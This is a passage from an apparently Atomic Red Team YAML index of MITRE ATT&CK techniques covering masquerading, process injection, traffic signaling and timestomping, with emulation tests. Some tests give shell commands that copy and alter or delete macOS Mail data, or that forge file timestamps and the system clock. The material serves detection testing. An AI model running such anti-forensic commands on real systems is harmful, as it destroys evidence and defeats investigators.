        description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.'
        url: https://www.elastic.co/blog/how-hunt-masquerade-ball
      - source_name: LOLBAS Main Site
        description: LOLBAS. (n.d.). Living Off The Land Binaries and Scripts (and also Libraries). Retrieved February 10, 2020.
        url: https://lolbas-project.github.io/
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:42.609Z'
      name: Masquerading
      description: |-
        Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

        Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)
      kill_chain_phases:
      - kill_chain_name: mitre-attack
        phase_name: defense-evasion
      x_mitre_attack_spec_version: 3.3.0
      x_mitre_contributors:
      - Oleg Kolesnikov, Securonix
      - Nick Carr, Mandiant
      - David Lu, Tripwire
      - Felipe Espósito, @Pr0teus
      - Elastic
      - Bartosz Jerzman
      - Menachem Goldstein
      x_mitre_deprecated: false
      x_mitre_detection: ''
      x_mitre_domains:
      - enterprise-attack
      x_mitre_is_subtechnique: false
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_platforms:
      - Containers
      - ESXi
      - Linux
      - macOS
      - Windows
      x_mitre_version: '1.8'
    identifier: T1036
    atomic_tests: []
  T1070.008:
    technique:
      type: attack-pattern
      spec_version: '2.1'
      id: attack-pattern--438c967d-3996-4870-bfc2-3954752a1927
      created: '2022-07-08T21:04:03.739Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      revoked: false
      external_references:
      - source_name: mitre-attack
        url: https://attack.mitre.org/techniques/T1070/008
        external_id: T1070.008
      - source_name: Volexity SolarWinds
        description: Cash, D. et al. (2020, December 14). Dark Halo Leverages SolarWinds Compromise to Breach Organizations. Retrieved December 29, 2020.
        url: https://www.volexity.com/blog/2020/12/14/dark-halo-leverages-solarwinds-compromise-to-breach-organizations/
      - source_name: Cybereason Cobalt Kitty 2017
        description: Dahan, A. (2017). Operation Cobalt Kitty. Retrieved December 27, 2018.
        url: https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf
      - source_name: mailx man page
        description: Michael Kerrisk. (2021, August 27). mailx(1p) — Linux manual page. Retrieved June 10, 2022.
        url: https://man7.org/linux/man-pages/man1/mailx.1p.html
      - source_name: ExchangePowerShell Module
        description: Microsoft. (2017, September 25). ExchangePowerShell. Retrieved June 10, 2022.
        url: https://docs.microsoft.com/en-us/powershell/module/exchange/?view=exchange-ps#mailboxes
      - source_name: Microsoft OAuth Spam 2022
        description: Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.
        url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-04-15T21:56:59.810Z'
      name: 'Email Collection: Mailbox Manipulation'
      description: |-
        Adversaries may modify mail and mail application data to remove evidence of their activity. Email applications allow users and other programs to export and delete mailbox data via command line tools or use of APIs. Mail application data can be emails, email metadata, or logs generated by the application or operating system, such as export requests.

        Adversaries may manipulate emails and mailbox data to remove logs, artifacts, and metadata, such as evidence of [Phishing](https://attack.mitre.org/techniques/T1566)/[Internal Spearphishing](https://attack.mitre.org/techniques/T1534), [Email Collection](https://attack.mitre.org/techniques/T1114), [Mail Protocols](https://attack.mitre.org/techniques/T1071/003) for command and control, or email-based exfiltration such as [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). For example, to remove evidence on Exchange servers adversaries have used the ExchangePowerShell [PowerShell](https://attack.mitre.org/techniques/T1059/001) module, including Remove-MailboxExportRequest to remove evidence of mailbox exports.(Citation: Volexity SolarWinds)(Citation: ExchangePowerShell Module) On Linux and macOS, adversaries may also delete emails through a command line utility called mail or use [AppleScript](https://attack.mitre.org/techniques/T1059/002) to interact with APIs on macOS.(Citation: Cybereason Cobalt Kitty 2017)(Citation: mailx man page)

        Adversaries may also remove emails and metadata/headers indicative of spam or suspicious activity (for example, through the use of organization-wide transport rules) to reduce the likelihood of malicious emails being detected by security products.(Citation: Microsoft OAuth Spam 2022)
      kill_chain_phases:
      - kill_chain_name: mitre-attack
        phase_name: defense-evasion
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_contributors:
      - Liran Ravich, CardinalOps
      x_mitre_deprecated: false
      x_mitre_detection: ''
      x_mitre_domains:
      - enterprise-attack
      x_mitre_is_subtechnique: true
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_platforms:
      - Linux
      - macOS
      - Office Suite
      - Windows
      x_mitre_version: '1.2'
    identifier: T1070.008
    atomic_tests:
    - name: Copy and Delete Mailbox Data on macOS
      auto_generated_guid: 3824130e-a6e4-4528-8091-3a52eeb540f6
      description: 'Copies and deletes mail data on macOS '
      supported_platforms:
      - macos
      executor:
        command: |
          mkdir ~/Library/Mail/copy
          cp -R ~/Library/Mail/* ~/Library/Mail/copy
          rm -rf ~/Library/Mail/copy/*
        cleanup_command: 'rm -rf ~/Library/Mail/copy '
        name: bash
        elevation_required: true
    - name: Copy and Modify Mailbox Data on macOS
      auto_generated_guid: 8a0b1579-5a36-483a-9cde-0236983e1665
      description: 'Copies and modifies mail data on macOS '
      supported_platforms:
      - macos
      executor:
        command: |
          mkdir ~/Library/Mail/copy
          cp -R ~/Library/Mail/* ~/Library/Mail/copy
          echo "Manipulated data" > ~/Library/Mail/copy/manipulated.txt
        cleanup_command: 'rm -rf ~/Library/Mail/copy '
        name: bash
        elevation_required: true
  T1055:
    technique:
      type: attack-pattern
      spec_version: '2.1'
      id: attack-pattern--43e7dc91-05b2-474c-b9ac-2ed4fe101f4d
      created: '2017-05-31T21:30:47.843Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      revoked: false
      external_references:
      - source_name: mitre-attack
        url: https://attack.mitre.org/techniques/T1055
        external_id: T1055
      - source_name: GNU Acct
        description: GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.
        url: https://www.gnu.org/software/acct/
      - source_name: Elastic Process Injection July 2017
        description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.'
        url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
      - source_name: RHEL auditd
        description: Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.
        url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
      - source_name: ArtOfMemoryForensics
        description: 'Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.'
      - source_name: Microsoft Sysmon v6 May 2017
        description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.
        url: https://docs.microsoft.com/sysinternals/downloads/sysmon
      - source_name: Chokepoint preload rootkits
        description: stderr. (2014, February 14). Detecting Userland Preload Rootkits. Retrieved December 20, 2017.
        url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:43.053Z'
      name: Process Injection
      description: |-
        Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.

        There are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific.

        More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.
      kill_chain_phases:
      - kill_chain_name: mitre-attack
        phase_name: defense-evasion
      - kill_chain_name: mitre-attack
        phase_name: privilege-escalation
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_contributors:
      - Anastasios Pingios
      - Christiaan Beek, @ChristiaanBeek
      - Ryan Becwar
      x_mitre_deprecated: false
      x_mitre_detection: ''
      x_mitre_domains:
      - enterprise-attack
      x_mitre_is_subtechnique: false
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_platforms:
      - Linux
      - macOS
      - Windows
      x_mitre_version: '1.4'
    identifier: T1055
    atomic_tests: []
  T1205:
    technique:
      type: attack-pattern
      spec_version: '2.1'
      id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c
      created: '2018-04-18T17:59:24.739Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      revoked: false
      external_references:
      - source_name: mitre-attack
        url: https://attack.mitre.org/techniques/T1205
        external_id: T1205
      - source_name: Bleeping Computer - Ryuk WoL
        description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.
        url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/
      - source_name: AMD Magic Packet
        description: AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.
        url: https://www.amd.com/system/files/TechDocs/20213.pdf
      - source_name: Mandiant - Synful Knock
        description: Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved November 17, 2024.
        url: https://cloud.google.com/blog/topics/threat-intelligence/synful-knock-acis/
      - source_name: Cisco Synful Knock Evolution
        description: Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.
        url: https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices
      - source_name: Hartrell cd00r 2002
        description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.'
        url: https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631
      - source_name: Cisco Blog Legacy Device Attacks
        description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.
        url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954
      - source_name: GitLab WakeOnLAN
        description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February 17, 2021.
        url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:43.225Z'
      name: Traffic Signaling
      description: |-
        Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.

        Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).

        The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.

        On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.

        Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)
      kill_chain_phases:
      - kill_chain_name: mitre-attack
        phase_name: defense-evasion
      - kill_chain_name: mitre-attack
        phase_name: persistence
      - kill_chain_name: mitre-attack
        phase_name: command-and-control
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_contributors:
      - Tony Lee
      - Josh Day, Gigamon
      x_mitre_deprecated: false
      x_mitre_detection: ''
      x_mitre_domains:
      - enterprise-attack
      x_mitre_is_subtechnique: false
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_platforms:
      - Linux
      - macOS
      - Network Devices
      - Windows
      x_mitre_version: '2.5'
    atomic_tests: []
  T1218:
    technique:
      type: attack-pattern
      spec_version: '2.1'
      id: attack-pattern--457c7820-d331-465a-915e-42f85500ccc4
      created: '2018-04-18T17:59:24.739Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      revoked: false
      external_references:
      - source_name: mitre-attack
        url: https://attack.mitre.org/techniques/T1218
        external_id: T1218
      - source_name: GTFO split
        description: GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.
        url: https://gtfobins.github.io/gtfobins/split/
      - source_name: LOLBAS Project
        description: Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.
        url: https://github.com/LOLBAS-Project/LOLBAS#criteria
      - source_name: split man page
        description: Torbjorn Granlund, Richard M. Stallman. (2020, March). split(1) — Linux manual page. Retrieved March 25, 2022.
        url: https://man7.org/linux/man-pages/man1/split.1.html
      object_marking_refs:
      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
      modified: '2025-10-24T17:48:43.406Z'
      name: Signed Binary Proxy Execution
      description: |-
        Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries.

        Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.

        Similarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)
      kill_chain_phases:
      - kill_chain_name: mitre-attack
        phase_name: defense-evasion
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_contributors:
      - Nishan Maharjan, @loki248
      - Hans Christoffer Gaardløs
      - Praetorian
      - Wes Hurd
      x_mitre_deprecated: false
      x_mitre_detection: ''
      x_mitre_domains:
      - enterprise-attack
      x_mitre_is_subtechnique: false
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      x_mitre_platforms:
      - Windows
      - Linux
      - macOS
      x_mitre_version: '3.2'
    identifier: T1218
    atomic_tests: []
  T1070.006:
    technique:
      type: attack-pattern
      spec_version: '2.1'
      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
      created: '2020-01-31T12:42:44.103Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      revoked: false
      external_references:
      - source_name: mitre-attack
        url: https://attack.mitre.org/techniques/T1070/006
        external_id: T1070.006
      - source_name: Juniper Networks ESXi Backdoor 2022
        description: Asher Langton. (2022, December 9). A Custom Python Backdoor for VMWare ESXi Servers. Retrieved March 26, 2025.
        url: https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers
      - source_name: WindowsIR Anti-Forensic Techniques
        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.'
url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html - source_name: Inversecos Linux Timestomping description: 'inversecos. (2022, August 4). Detecting Linux Anti-Forensics: Timestomping. Retrieved March 26, 2025.' url: https://www.inversecos.com/2022/08/detecting-linux-anti-forensics.html - source_name: Inversecos Timestomping 2022 description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping Detection – NTFS Forensics. Retrieved September 30, 2024.' url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html - source_name: Magnet Forensics description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024. url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/ - source_name: Double Timestomping description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024. url: https://x.com/matthewdunwoody/status/1519846657646604289 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:43.937Z' name: 'Indicator Removal on Host: Timestomp' description: |- Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files. 
In Windows systems, both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics) Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022) Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping) In Linux systems and on ESXi servers, threat actors may attempt to perform timestomping using commands such as `touch -a -m -t ` (which sets access and modification times to a specific value) or `touch -r ` (which sets access and modification times to match those of another file).(Citation: Inversecos Linux Timestomping)(Citation: Juniper Networks ESXi Backdoor 2022) Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - Romain Dumont, ESET - Mike Hartley @mikehartley10 x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: true x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - ESXi - Linux - macOS - Windows x_mitre_version: 
'1.2' identifier: T1070.006 atomic_tests: - name: Set a file's access timestamp auto_generated_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 description: 'Stomps on the access timestamp of a file ' supported_platforms: - linux - macos input_arguments: target_filename: description: Path of file that we are going to stomp on last access time type: path default: "/tmp/T1070.006-access.txt" dependencies: - description: 'The file must exist in order to be timestomped ' prereq_command: 'test -e #{target_filename} && exit 0 || exit 1 ' get_prereq_command: 'echo ''T1070.006 file access timestomp test'' > #{target_filename} ' executor: command: 'touch -a -t 197001010000.00 #{target_filename} ' cleanup_command: 'rm -f #{target_filename} ' name: sh - name: Set a file's modification timestamp auto_generated_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 description: 'Stomps on the modification timestamp of a file ' supported_platforms: - linux - macos input_arguments: target_filename: description: Path of file that we are going to stomp on last access time type: path default: "/tmp/T1070.006-modification.txt" dependencies: - description: 'The file must exist in order to be timestomped ' prereq_command: 'test -e #{target_filename} && exit 0 || exit 1 ' get_prereq_command: 'echo ''T1070.006 file modification timestomp test'' > #{target_filename} ' executor: command: 'touch -m -t 197001010000.00 #{target_filename} ' cleanup_command: 'rm -f #{target_filename} ' name: sh - name: Set a file's creation timestamp auto_generated_guid: 8164a4a6-f99c-4661-ac4f-80f5e4e78d2b description: | Stomps on the create timestamp of a file Setting the creation timestamp requires changing the system clock and reverting. Sudo or root privileges are required to change date. Use with caution. 
supported_platforms: - linux - macos input_arguments: target_filename: description: Path of file that we are going to stomp on last access time type: path default: "/tmp/T1070.006-creation.txt" executor: elevation_required: true command: | NOW=$(date +%m%d%H%M%Y) date 010100001971 touch #{target_filename} date "$NOW" stat #{target_filename} cleanup_command: 'rm -f #{target_filename} ' name: sh - name: Modify file timestamps using reference file auto_generated_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 description: | Modifies the `modify` and `access` timestamps using the timestamps of a specified reference file. This technique was used by the threat actor Rocke during the compromise of Linux web servers. supported_platforms: - linux - macos input_arguments: target_file_path: description: Path of file to modify timestamps of type: path default: "/tmp/T1070.006-reference.txt" reference_file_path: description: Path of reference file to read timestamps from type: path default: "/bin/sh" executor: command: | touch #{target_file_path} touch -acmr #{reference_file_path} #{target_file_path} cleanup_command: 'rm -f #{target_file_path} ' name: sh - name: MacOS - Timestomp Date Modified auto_generated_guid: 87fffff4-d371-4057-a539-e3b24c37e564 description: 'Stomps on the modification timestamp of a file using MacOS''s SetFile utility ' supported_platforms: - macos input_arguments: target_filename: description: 'Path of file that we are going to stomp on last modified time ' type: path default: "/tmp/T1070.006-modified.txt" target_date: description: Date to replace original timestamps with type: string default: 01/01/1970 dependencies: - description: 'The file must exist in order to be timestomped ' prereq_command: 'test -e #{target_filename} && exit 0 || exit 1 ' get_prereq_command: 'echo ''T1070.006 MacOS file modified timestomp test'' > #{target_filename} ' executor: name: sh command: 'SetFile -m #{target_date} #{target_filename} ' cleanup_command: 'rm -f #{target_filename} 
' T1620: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--4933e63b-9b77-476e-ab29-761bc5b7d15a created: '2021-10-05T01:15:06.293Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1620 external_id: T1620 - source_name: 00sec Droppers description: 0x00pico. (2017, September 25). Super-Stealthy Droppers. Retrieved October 4, 2021. url: https://0x00sec.org/t/super-stealthy-droppers/3715 - source_name: S1 Custom Shellcode Tool description: Bunce, D. (2019, October 31). Building A Custom Tool For Shellcode Analysis. Retrieved October 4, 2021. url: https://www.sentinelone.com/blog/building-a-custom-tool-for-shellcode-analysis/ - source_name: Mandiant BYOL description: Kirk, N. (2018, June 18). Bring Your Own Land (BYOL) – A Novel Red Teaming Technique. Retrieved October 4, 2021. url: https://www.mandiant.com/resources/bring-your-own-land-novel-red-teaming-technique - source_name: S1 Old Rat New Tricks description: Landry, J. (2016, April 21). Teaching an old RAT new tricks. Retrieved October 4, 2021. url: https://www.sentinelone.com/blog/teaching-an-old-rat-new-tricks/ - source_name: MDSec Detecting DOTNET description: MDSec Research. (n.d.). Detecting and Advancing In-Memory .NET Tradecraft. Retrieved October 4, 2021. url: https://www.mdsec.co.uk/2020/06/detecting-and-advancing-in-memory-net-tradecraft/ - source_name: Microsoft AssemblyLoad description: Microsoft. (n.d.). Assembly.Load Method. Retrieved February 9, 2024. url: https://learn.microsoft.com/dotnet/api/system.reflection.assembly.load - source_name: Intezer ACBackdoor description: 'Sanmillan, I. (2019, November 18). ACBackdoor: Analysis of a New Multiplatform Backdoor. Retrieved October 4, 2021.' url: https://www.intezer.com/blog/research/acbackdoor-analysis-of-a-new-multiplatform-backdoor/ - source_name: Stuart ELF Memory description: Stuart. (2018, March 31). 
In-Memory-Only ELF Execution (Without tmpfs). Retrieved October 4, 2021. url: https://magisterquis.github.io/2018/03/31/in-memory-only-elf-execution.html - source_name: Introducing Donut description: The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021. url: https://thewover.github.io/Introducing-Donut/ object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-10-24T17:48:44.030Z' name: Reflective Code Loading description: |- Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)). Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad) Reflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the “injection” loads code into the processes’ own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. 
Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks) kill_chain_phases: - kill_chain_name: mitre-attack phase_name: defense-evasion x_mitre_attack_spec_version: 3.2.0 x_mitre_contributors: - João Paulo de A. Filho, @Hug1nN__ - Shlomi Salem, SentinelOne - Lior Ribak, SentinelOne - Rex Guo, @Xiaofei_REX, Confluera - Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics - Jiraput Thamsongkrah x_mitre_deprecated: false x_mitre_detection: '' x_mitre_domains: - enterprise-attack x_mitre_is_subtechnique: false x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_platforms: - Linux - macOS - Windows x_mitre_version: '1.3' identifier: T1620 atomic_tests: [] T1480.002: technique: type: attack-pattern spec_version: '2.1' id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742 created: '2024-09-19T14:00:03.401Z' created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 revoked: false external_references: - source_name: mitre-attack url: https://attack.mitre.org/techniques/T1480/002 external_id: T1480.002 - source_name: Intezer RedXOR 2021 description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved September 19, 2024. url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/ - source_name: Sans Mutexes 2012 description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024. url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/ - source_name: ICS Mutexes 2015 description: Lenny Zeltser. 
(2015, March 9). How Malware Generates Mutex Names to Evade Detection. Retrieved September 19, 2024. url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/ - source_name: Microsoft Mutexes description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19, 2024. url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes - source_name: Deep Instinct BPFDoor 2023 description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September 19, 2024. url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 modified: '2025-04-15T22:50:39.088Z' name: Mutual Exclusion description: |- Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes) While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012) In Linux environments, malware may instead attempt to acquire a lock on a mutex file. 
